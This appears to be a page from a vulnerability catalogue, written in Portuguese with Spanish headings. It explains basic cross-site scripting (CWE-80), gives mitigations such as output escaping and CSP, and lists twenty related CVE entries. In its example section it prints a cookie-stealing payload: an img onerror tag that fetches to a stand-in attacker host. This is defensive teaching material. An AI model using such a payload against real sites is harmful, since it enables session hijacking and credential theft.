Fallos del tipo CWE-80

586 resultados

Falta de neutralização de tags HTML relacionadas a scripts (XSS básico)

Quando uma aplicação web recebe dados do usuário e os insere diretamente no HTML da página sem sanitização ou escapamento, um atacante consegue injetar tags e scripts maliciosos que executam no navegador de outros usuários. É um dos tipos mais comuns de XSS (Cross-Site Scripting) e permite roubo de sessão, credenciais ou redirecionamento para sites maliciosos.

Ejemplo

Um formulário de busca que mostra o termo pesquisado na página sem validação: se o usuário entra <script>alert('xss')</script>, o script executa. Ou um campo de comentário que exibe <img src=x onerror='fetch(malicious.com?cookie='+document.cookie+')'>, roubando o cookie da sessão.

Cómo mitigar

Sempre escapar/encodar saídas HTML (ex: converter < para &lt;, > para &gt;), usar Content Security Policy (CSP) nos headers HTTP, e validar/sanitizar entrada no servidor. Em JavaScript, prefira textContent no lugar de innerHTML quando possível; em frameworks, use templating seguro (React, Vue escapam por padrão).

CVE-2025-60100MEDIUMWordPress XStore theme < 9.6 - Content Injection vulnerabilityEPSS 0.3%CVE-2024-37156MEDIUMTokenController formName not sanitized in hidden inputEPSS 0.3%CVE-2025-11966LOWIn Eclipse Vert.x versions [4.0.0, 4.5.21] and [5.0.0, 5.0.4], when "directory listing" is enabled, file and directory names are inserted inEPSS 0.3%CVE-2024-42195LOWHCL DevOps Deploy / HCL Launch is vulnerable to HTML injectionEPSS 0.3%CVE-2024-38039MEDIUMBUG-000161683 - HTML injection vulnerability in Portal for ArcGIS.EPSS 0.3%CVE-2023-45053MEDIUMWordPress WP Content Pilot plugin <= 1.3.3 - HTML Injection vulnerabilityEPSS 0.3%CVE-2025-3521MEDIUMTeam Members – Best WordPress Team Plugin with Team Slider, Team Showcase & Team Builder <= 3.4.1 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.3%CVE-2024-50344MEDIUMI, Librarian has a Stored XSS vulnerability in Supplemental FilesEPSS 0.3%CVE-2025-29430MEDIUMCode-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in /pages/room.php via the id and romEPSS 0.3%CVE-2024-5741MEDIUMXSS in inventory viewEPSS 0.3%CVE-2025-28015MEDIUMA HTML Injection vulnerability was found in loginsystem/edit-profile.php of the PHPGurukul User Registration & Login and User Management SysEPSS 0.3%CVE-2023-23735MEDIUMWordPress Spectra – WordPress Gutenberg Blocks plugin <= 2.3.0 - Unauthenticated Email HTML Injection VulnerabilityEPSS 0.3%CVE-2023-46310MEDIUMWordPress wpDiscuz plugin <= 7.6.10 - Content Injection vulnerabilityEPSS 0.3%CVE-2026-43938HIGHYAF.NET: Unauthenticated Stored Second-Order XSS in Admin Event Log via Reflected `User-Agent` HeaderEPSS 0.3%CVE-2025-4126MEDIUMEG-Series <= 2.1.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via ShortcodeEPSS 0.3%CVE-2025-62414MEDIUMbagisto - Cross Site Scripting (XSS) in Create New CustomerEPSS 0.3%CVE-2025-63068MEDIUMWordPress Contact Form 7 Dynamic Text Extension plugin <= 5.0.5 - Content Injection vulnerabilityEPSS 0.3%CVE-2025-66512MEDIUMNextcloud Server vulnerable to XSS in SVG images when opened outside of NextcloudEPSS 0.3%CVE-2025-62897MEDIUMWordPress WP Recipe Maker plugin < 10.1.0 - Content Injection vulnerabilityEPSS 0.3%CVE-2025-64633MEDIUMWordPress Norebro Extra plugin <= 1.6.8 - Content Injection vulnerabilityEPSS 0.3%